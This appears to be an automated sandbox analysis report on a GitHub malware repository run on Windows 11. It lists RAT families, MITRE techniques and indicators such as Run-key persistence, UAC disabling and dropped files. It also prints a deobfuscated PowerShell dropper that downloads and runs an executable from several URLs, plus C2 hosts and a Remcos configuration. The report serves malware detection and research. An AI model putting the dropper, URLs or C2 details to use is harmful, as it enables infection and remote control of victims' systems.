crimsonrat | hxxps://github[.]com/Da2dalus/The-MALWARE-Repo

Resubmissions

12/03/2025, 02:46 UTC

250312-c9tt3svlw9 10

12/03/2025, 02:34 UTC

250312-c2wzgav1av 10

Analysis

max time kernel
468s
max time network
631s
platform
windows11-21h2_x64
resource
win11-20250217-en
resource tags

arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system
submitted
12/03/2025, 02:34 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/Da2dalus/The-MALWARE-Repo

Score

10^/10

crimsonrat modiloader njrat remcos revengerat warzonerat host credential_access defense_evasion discovery execution infostealer persistence privilege_escalation rat rezer0 spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

$jrfha0 = "Wf1rHz"

$uummli = "284"

$ibtj49n = "ThMqW8s0"

$fwcajs6 = $env:userprofile + "\\" + $uummli + ".exe"

$s9gzrstm = "EFCwnlGz"

$u8uar3 = new-object net.webclient

$pljbqine = "http://blockchainjoblist.com/wp-admin/014080/", "https://womenempowermentpakistan.com/wp-admin/paba5q52/", "https://atnimanvilla.com/wp-content/073735/", "https://yeuquynhnhai.com/upload/41830/", "https://deepikarai.com/js/4bzs6/"

$l4sjlogw = "zISjEmiP"

foreach ($v3hepmmz in $pljbqine) {

try {

$u8uar3.downloadfile($v3hepmmz, $fwcajs6)

$ivhhwrib = "s5Ts_iP8"

if ((get-item $fwcajs6).length -ge 23931) {

[diagnostics.process]::start($fwcajs6)

$zdns8wi = "F3Wwo0"

break

$ttjptxb = "ijlWhCzP"

}

} catch {

}

URLs

exe.dropper

http://blockchainjoblist.com/wp-admin/014080/

exe.dropper

https://womenempowermentpakistan.com/wp-admin/paba5q52/

exe.dropper

https://atnimanvilla.com/wp-content/073735/

exe.dropper

https://yeuquynhnhai.com/upload/41830/

exe.dropper

https://deepikarai.com/js/4bzs6/

Extracted

Family

crimsonrat

185.136.161.124

Extracted

Family

modiloader

https://drive.google.com/u/0/uc?id=1TcSctGVBajYMA7CFDc158wpvqkpxmkhJ&export=download

Extracted

Family

remcos

Version

1.7 Pro

Botnet

Host

nickman12-46565.portmap.io:46565

nickman12-46565.portmap.io:1735

Attributes

audio_folder
audio
audio_path
%AppData%
audio_record_time
5
connect_delay
0
connect_interval
5
copy_file
Userdata.exe
copy_folder
Userdata
delete_file
true
hide_file
true
hide_keylog_file
true
install_flag
true
install_path
%WinDir%\System32
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
keylog_path
%WinDir%\System32
mouse_option
false
mutex
remcos_vcexssuhap
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screens
screenshot_path
%AppData%
screenshot_time
1
startup_value
remcos
take_screenshot_option
false
take_screenshot_time
5

Signatures

CrimsonRAT main payload 1 IoCs

resource	yara_rule
behavioral1/files/0x001b00000002af1b-687.dat	family_crimsonrat

CrimsonRat
Crimson RAT is a malware linked to a Pakistani-linked threat actor.
rat crimsonrat
Crimsonrat family
crimsonrat
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader

Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-501547156-4130638328-323075719-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	WScript.exe

Modiloader family
modiloader
Njrat family
njrat

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4068	6092	powershell.exe	165

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos
RevengeRAT
Remote-access trojan with a wide range of capabilities.
trojan revengerat
Revengerat family
revengerat

UAC bypass 3 TTPs 2 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
rat infostealer warzonerat
Warzonerat family
warzonerat
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

ReZer0 packer 1 IoCs

Detects ReZer0, a packer with multiple versions used in various campaigns.

rezer0

resource	yara_rule
behavioral1/memory/3864-1588-0x00000000056D0000-0x00000000056F8000-memory.dmp	rezer0

RevengeRat Executable 1 IoCs

stealer

resource	yara_rule
behavioral1/files/0x001a00000002b207-1880.dat	revengerat

Blocklisted process makes network request 3 IoCs

flow	pid	Process
97	4068	powershell.exe
120	4068	powershell.exe
122	4068	powershell.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2220	netsh.exe

Drops startup file 48 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe	RegSvcs.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe	NJRat.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe	RegSvcs.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe\:Zone.Identifier:$DATA	NJRat.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe	NJRat.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe\:Zone.Identifier:$DATA	RegSvcs.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.a.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.a.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Axam.exe	Axam.exe

Executes dropped EXE 27 IoCs

pid	Process
3108	dlrarhsiva.exe
5624	Userdata.exe
4616	Server.exe
4680	svchost.exe
5424	Axam.exe
5956	Axam.exe
4668	Axam.exe
3100	Axam.exe
4016	Axam.exe
1268	Axam.exe
5976	Axam.exe
5504	Axam.exe
252	Axam.exe
5572	Axam.exe
6064	svchost.exe
2716	Axam.exe
1556	Axam.exe
4128	Axam.exe
240	Axam.exe
2112	Axam.exe
6064	svchost.exe
5364	Axam.exe
5920	Axam.exe
5196	Axam.exe
3404	Axam.exe
2684	svchost.exe
5556	Axam.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Uses the VBS compiler for execution 1 TTPs

Command and Scripting Interpreter
T1059

Adds Run key to start application 2 TTPs 28 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sysaxam32 = "C:\\Users\\Admin\\AppData\\Roaming\\Axam.exe"	Axam.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-501547156-4130638328-323075719-1000\Software\Microsoft\Windows\CurrentVersion\Run\remcos = "\"C:\\Windows\\SysWOW64\\Userdata\\Userdata.exe\""	Remcos.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-501547156-4130638328-323075719-1000\Software\Microsoft\Windows\CurrentVersion\Run\remcos = "\"C:\\Windows\\SysWOW64\\Userdata\\Userdata.exe\""	Userdata.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-501547156-4130638328-323075719-1000\Software\Microsoft\Windows\CurrentVersion\Run\b9584a316aeb9ca9b31edd4db18381f5 = "\"C:\\Users\\Admin\\Desktop\\NJRat.exe\" .."	NJRat.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sysaxam32 = "C:\\Users\\Admin\\AppData\\Roaming\\Axam.exe"	Axam.a.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sysaxam32 = "C:\\Users\\Admin\\AppData\\Roaming\\Axam.exe"	Axam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sysaxam32 = "C:\\Users\\Admin\\AppData\\Roaming\\Axam.exe"	Axam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sysaxam32 = "C:\\Users\\Admin\\AppData\\Roaming\\Axam.exe"	Axam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sysaxam32 = "C:\\Users\\Admin\\AppData\\Roaming\\Axam.exe"	Axam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sysaxam32 = "C:\\Users\\Admin\\AppData\\Roaming\\Axam.exe"	Axam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sysaxam32 = "C:\\Users\\Admin\\AppData\\Roaming\\Axam.exe"	Axam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sysaxam32 = "C:\\Users\\Admin\\AppData\\Roaming\\Axam.exe"	Axam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sysaxam32 = "C:\\Users\\Admin\\AppData\\Roaming\\Axam.exe"	Axam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sysaxam32 = "C:\\Users\\Admin\\AppData\\Roaming\\Axam.exe"	Axam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sysaxam32 = "C:\\Users\\Admin\\AppData\\Roaming\\Axam.exe"	Axam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sysaxam32 = "C:\\Users\\Admin\\AppData\\Roaming\\Axam.exe"	Axam.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-501547156-4130638328-323075719-1000\Software\Microsoft\Windows\CurrentVersion\Run\Server = "C:\\Users\\Admin\\AppData\\Roaming\\VanToM Folder\\Server.exe"	Server.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sysaxam32 = "C:\\Users\\Admin\\AppData\\Roaming\\Axam.exe"	Axam.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-501547156-4130638328-323075719-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\svchost.exe"	RegSvcs.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sysaxam32 = "C:\\Users\\Admin\\AppData\\Roaming\\Axam.exe"	Axam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sysaxam32 = "C:\\Users\\Admin\\AppData\\Roaming\\Axam.exe"	Axam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sysaxam32 = "C:\\Users\\Admin\\AppData\\Roaming\\Axam.exe"	Axam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sysaxam32 = "C:\\Users\\Admin\\AppData\\Roaming\\Axam.exe"	Axam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\b9584a316aeb9ca9b31edd4db18381f5 = "\"C:\\Users\\Admin\\Desktop\\NJRat.exe\" .."	NJRat.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-501547156-4130638328-323075719-1000\Software\Microsoft\Windows\CurrentVersion\Run\Server = "C:\\Users\\Admin\\Desktop\\VanToM-Rat.bat"	VanToM-Rat.bat
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sysaxam32 = "C:\\Users\\Admin\\AppData\\Roaming\\Axam.exe"	Axam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sysaxam32 = "C:\\Users\\Admin\\AppData\\Roaming\\Axam.exe"	Axam.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sysaxam32 = "C:\\Users\\Admin\\AppData\\Roaming\\Axam.exe"	Axam.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs

Web Service

T1102

flow	ioc
344	0.tcp.ngrok.io
1	drive.google.com
58	drive.google.com
108	0.tcp.ngrok.io
123	0.tcp.ngrok.io
402	0.tcp.ngrok.io
14	0.tcp.ngrok.io
179	0.tcp.ngrok.io
217	0.tcp.ngrok.io
295	0.tcp.ngrok.io

Drops autorun.inf file 1 TTPs 9 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File created	C:\AutoRun.inf	WScript.exe
File opened for modification	C:\AutoRun.inf	WScript.exe
File created	F:\AutoRun.inf	WScript.exe
File created	F:\AutoRun.inf	vbc.exe
File opened for modification	C:\svchost\AutoRun.inf	RegSvcs.exe
File opened for modification	F:\AutoRun.inf	WScript.exe
File opened for modification	F:\svchost\AutoRun.inf	RegSvcs.exe
File created	C:\AutoRun.inf	vbc.exe
File created	F:\AutoRun.inf	vbc.exe

Drops file in System32 directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System32\Printing_Admin_Scripts\it-IT\prnjobs.vbs	WScript.exe
File created	C:\Windows\System32\oobe\fr-FR\OOBE_HELP_Opt_in_Details.htm	WScript.exe
File created	C:\Windows\System32\Printing_Admin_Scripts\de-DE\prnmngr.vbs	WScript.exe
File created	C:\Windows\System32\Printing_Admin_Scripts\es-ES\prnqctl.vbs	WScript.exe
File created	C:\Windows\SysWOW64\Printing_Admin_Scripts\de-DE\prnmngr.vbs	WScript.exe
File created	C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\prndrvr.vbs	WScript.exe
File created	C:\Windows\SysWOW64\Printing_Admin_Scripts\es-ES\prnjobs.vbs	WScript.exe
File created	C:\Windows\SysWOW64\Printing_Admin_Scripts\it-IT\prndrvr.vbs	WScript.exe
File created	C:\Windows\System32\oobe\ja-JP\oobe_learn_more_activity_history.htm	WScript.exe
File created	C:\Windows\System32\Printing_Admin_Scripts\en-US\prnmngr.vbs	WScript.exe
File created	C:\Windows\System32\Printing_Admin_Scripts\es-ES\prndrvr.vbs	WScript.exe
File created	C:\Windows\SysWOW64\Printing_Admin_Scripts\de-DE\prnqctl.vbs	WScript.exe
File created	C:\Windows\System32\Printing_Admin_Scripts\ja-JP\prnport.vbs	WScript.exe
File created	C:\Windows\System32\Printing_Admin_Scripts\fr-FR\prnqctl.vbs	WScript.exe
File created	C:\Windows\System32\Printing_Admin_Scripts\de-DE\prncnfg.vbs	WScript.exe
File created	C:\Windows\System32\Printing_Admin_Scripts\es-ES\prnjobs.vbs	WScript.exe
File created	C:\Windows\System32\Printing_Admin_Scripts\ja-JP\prncnfg.vbs	WScript.exe
File created	C:\Windows\System32\Printing_Admin_Scripts\it-IT\prncnfg.vbs	WScript.exe
File created	C:\Windows\System32\Printing_Admin_Scripts\it-IT\prnport.vbs	WScript.exe
File created	C:\Windows\SysWOW64\Printing_Admin_Scripts\es-ES\prnport.vbs	WScript.exe
File created	C:\Windows\SysWOW64\Printing_Admin_Scripts\ja-JP\prnjobs.vbs	WScript.exe
File created	C:\Windows\System32\Printing_Admin_Scripts\en-US\prnjobs.vbs	WScript.exe
File created	C:\Windows\System32\Printing_Admin_Scripts\es-ES\prnport.vbs	WScript.exe
File created	C:\Windows\System32\Printing_Admin_Scripts\it-IT\prnqctl.vbs	WScript.exe
File created	C:\Windows\System32\Printing_Admin_Scripts\ja-JP\prnqctl.vbs	WScript.exe
File created	C:\Windows\SysWOW64\Printing_Admin_Scripts\fr-FR\prnport.vbs	WScript.exe
File created	C:\Windows\SysWOW64\Printing_Admin_Scripts\it-IT\prncnfg.vbs	WScript.exe
File created	C:\Windows\SysWOW64\Printing_Admin_Scripts\ja-JP\prnport.vbs	WScript.exe
File created	C:\Windows\System32\Printing_Admin_Scripts\de-DE\prnjobs.vbs	WScript.exe
File created	C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\prncnfg.vbs	WScript.exe
File opened for modification	C:\Windows\SysWOW64\Userdata	Remcos.exe
File created	C:\Windows\SysWOW64\Printing_Admin_Scripts\fr-FR\prndrvr.vbs	WScript.exe
File created	C:\Windows\System32\Printing_Admin_Scripts\es-ES\prncnfg.vbs	WScript.exe
File created	C:\Windows\System32\Printing_Admin_Scripts\fr-FR\prncnfg.vbs	WScript.exe
File created	C:\Windows\SysWOW64\Printing_Admin_Scripts\es-ES\prndrvr.vbs	WScript.exe
File created	C:\Windows\SysWOW64\Userdata\Userdata.exe	Remcos.exe
File created	C:\Windows\System32\oobe\es-ES\oobe_learn_more_activity_history.htm	WScript.exe
File created	C:\Windows\System32\oobe\uk-UA\OOBE_HELP_Opt_in_Details.htm	WScript.exe
File created	C:\Windows\System32\Printing_Admin_Scripts\es-ES\prnmngr.vbs	WScript.exe
File created	C:\Windows\SysWOW64\Printing_Admin_Scripts\fr-FR\pubprn.vbs	WScript.exe
File created	C:\Windows\System32\Printing_Admin_Scripts\ja-JP\prndrvr.vbs	WScript.exe
File created	C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\prnjobs.vbs	WScript.exe
File created	C:\Windows\System32\Printing_Admin_Scripts\ja-JP\pubprn.vbs	WScript.exe
File created	C:\Windows\System32\oobe\it-IT\OOBE_HELP_Opt_in_Details.htm	WScript.exe
File created	C:\Windows\System32\Printing_Admin_Scripts\it-IT\prndrvr.vbs	WScript.exe
File created	C:\Windows\System32\Printing_Admin_Scripts\it-IT\pubprn.vbs	WScript.exe
File created	C:\Windows\SysWOW64\Printing_Admin_Scripts\de-DE\prndrvr.vbs	WScript.exe
File created	C:\Windows\SysWOW64\Printing_Admin_Scripts\it-IT\prnport.vbs	WScript.exe
File created	C:\Windows\SysWOW64\Printing_Admin_Scripts\ja-JP\prnqctl.vbs	WScript.exe
File created	C:\Windows\System32\Administrator.vbs	WScript.exe
File created	C:\Windows\SysWOW64\Printing_Admin_Scripts\es-ES\prncnfg.vbs	WScript.exe
File created	C:\Windows\SysWOW64\Printing_Admin_Scripts\fr-FR\prnqctl.vbs	WScript.exe
File created	C:\Windows\System32\oobe\fr-FR\oobe_learn_more_activity_history.htm	WScript.exe
File created	C:\Windows\SysWOW64\Printing_Admin_Scripts\de-DE\pubprn.vbs	WScript.exe
File created	C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\prnport.vbs	WScript.exe
File opened for modification	C:\Windows\System32\Administrator.ini	WScript.exe
File created	C:\Windows\SysWOW64\Userdata\Userdata.exe:Zone.Identifier:$DATA	Remcos.exe
File created	C:\Windows\System32\gatherNetworkInfo.vbs	WScript.exe
File created	C:\Windows\SysWOW64\Printing_Admin_Scripts\it-IT\prnqctl.vbs	WScript.exe
File created	C:\Windows\SysWOW64\Printing_Admin_Scripts\ja-JP\prnmngr.vbs	WScript.exe
File created	C:\Windows\SysWOW64\Printing_Admin_Scripts\fr-FR\prnmngr.vbs	WScript.exe
File opened for modification	C:\Windows\SysWOW64\Userdata\Userdata.exe	Remcos.exe
File created	C:\Windows\System32\oobe\de-DE\OOBE_HELP_Opt_in_Details.htm	WScript.exe
File created	C:\Windows\System32\Printing_Admin_Scripts\en-US\prndrvr.vbs	WScript.exe

Suspicious use of SetThreadContext 11 IoCs

description	pid	Process	procid_target
PID 5784 set thread context of 5844	5784	RevengeRAT.exe	131
PID 5844 set thread context of 5888	5844	RegSvcs.exe	132
PID 3864 set thread context of 4764	3864	WarzoneRAT.exe	141
PID 4680 set thread context of 1052	4680	svchost.exe	170
PID 1052 set thread context of 2396	1052	RegSvcs.exe	171
PID 6064 set thread context of 4792	6064	svchost.exe	246
PID 4792 set thread context of 6060	4792	RegSvcs.exe	247
PID 6064 set thread context of 5808	6064	svchost.exe	262
PID 5808 set thread context of 4820	5808	RegSvcs.exe	263
PID 2684 set thread context of 2892	2684	svchost.exe	349
PID 2892 set thread context of 1008	2892	RegSvcs.exe	281

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\KaZaA Lite\My Shared Folder\AjeedNASA.exe	Axam.exe
File created	C:\Program Files (x86)\limewire\Shared\Super Mario.exe	Axam.exe
File created	C:\Program Files (x86)\Kazaa\My Shared Folder\Invisible_man.exe	Axam.exe
File created	C:\Program Files (x86)\KaZaA Lite\My Shared Folder\AjeedNASA.exe	Axam.exe
File created	C:\Program Files (x86)\limewire\Shared\Super Mario.exe	Axam.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\dialogs\create_stream.html	WScript.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\dialogs\mosaic_window.html	WScript.exe
File created	C:\Program Files (x86)\limewire\Shared\Super Mario.exe	Axam.exe
File created	C:\Program Files (x86)\KaZaA Lite\My Shared Folder\AjeedNASA.exe	Axam.exe
File created	C:\Program Files (x86)\Grokster\My Grokster\XXX_HOTSEX.exe	Axam.exe
File created	C:\Program Files (x86)\BearShare\Shared\fxbgbear.exe	Axam.exe
File created	C:\Program Files (x86)\limewire\Shared\Super Mario.exe	Axam.exe
File created	C:\Program Files (x86)\KaZaA Lite\My Shared Folder\AjeedNASA.exe	Axam.exe
File created	C:\Program Files (x86)\KMD\My Shared Folder\Axam.exe	Axam.exe
File created	C:\Program Files (x86)\Edonkey2000\Incoming\setup_flash.exe	Axam.exe
File created	C:\Program Files (x86)\Kazaa\My Shared Folder\Invisible_man.exe	Axam.exe
File created	C:\Program Files (x86)\Morpheus\My Shared Folder\Blaster.exe	Axam.a.exe
File created	C:\Program Files (x86)\KMD\My Shared Folder\Axam.exe	Axam.exe
File created	C:\Program Files (x86)\BearShare\Shared\fxbgbear.exe	Axam.exe
File created	C:\Program Files (x86)\Edonkey2000\Incoming\setup_flash.exe	Axam.exe
File created	C:\Program Files (x86)\limewire\Shared\Super Mario.exe	Axam.exe
File created	C:\Program Files (x86)\Morpheus\My Shared Folder\Blaster.exe	Axam.exe
File created	C:\Program Files (x86)\BearShare\Shared\fxbgbear.exe	Axam.exe
File created	C:\Program Files (x86)\Grokster\My Grokster\XXX_HOTSEX.exe	Axam.exe
File created	C:\Program Files (x86)\Kazaa\My Shared Folder\Invisible_man.exe	Axam.exe
File created	C:\Program Files (x86)\KMD\My Shared Folder\Axam.exe	Axam.exe
File created	C:\Program Files (x86)\KaZaA Lite\My Shared Folder\AjeedNASA.exe	Axam.exe
File created	C:\Program Files (x86)\Edonkey2000\Incoming\setup_flash.exe	Axam.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\index.html	WScript.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\mobile_equalizer.html	WScript.exe
File created	C:\Program Files (x86)\Edonkey2000\Incoming\setup_flash.exe	Axam.exe
File created	C:\Program Files (x86)\Edonkey2000\Incoming\setup_flash.exe	Axam.exe
File created	C:\Program Files (x86)\Kazaa\My Shared Folder\Invisible_man.exe	Axam.exe
File created	C:\Program Files (x86)\Edonkey2000\Incoming\setup_flash.exe	Axam.exe
